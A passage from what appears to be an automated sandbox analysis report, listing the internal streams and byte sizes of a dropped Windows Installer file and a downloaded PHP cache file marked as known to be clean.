Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 | 16 | 16 Bytes |
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 | 17 | 2 Bytes |
C:\Windows\Installer\18fe687.ipi | Dropped File | OLE Compound |
CFB Streams (17)
Name | ID | Size | Actions |
Root\䕙䇲䆸㲷䠧 | 1 | 0 Bytes | - |
Root\䕙䇲䆸㷷䐤䠨 | 2 | 0 Bytes | - |
Root\䒕䒪㾱䈶䠵 | 3 | 18 Bytes |
Root\䈜䈯䗦䒬䖱 | 4 | 0 Bytes | - |
Root\䒏䇯䕨䠶 | 5 | 0 Bytes | - |
Root\䕙䓲䕨䌷䖨 | 6 | 0 Bytes | - |
Root\䌝䈰䗜䐤㵳䚲 | 7 | 0 Bytes | - |
Root\䌝䈰䗜䐤㱳䊬䠫 | 8 | 0 Bytes | - |
Root\䄍䄷䄥䈶䄙䋷 | 9 | 0 Bytes | - |
Root\䌍䎶䕙䐲䗳 | 10 | 0 Bytes | - |
Root\䌍䎶䈜䌵䏤 | 11 | 0 Bytes | - |
Root\䜜䗶䐨䈛䗶䕲㼨䔨䈸䆱䠨 | 12 | 2 Bytes |
Root\䉊䈷㻵䅨䒲䠷 | 13 | 0 Bytes | - |
Root\䕝䑤䄶䗦䒬㷱䐤䠨 | 14 | 40 Bytes |
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䒕䠺 | 15 | 20 Bytes |
Root\䕝䑤䄶䗦䒬㫱䊨䑬䌝䈰䌑䋪 | 16 | 16 Bytes |
Root\䘖䗯㹬䆤䄮䈪䕝䑤䄶䗦䒬䠱 | 17 | 2 Bytes |
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\version[1].php | Downloaded File | Stream |
Known to be clean.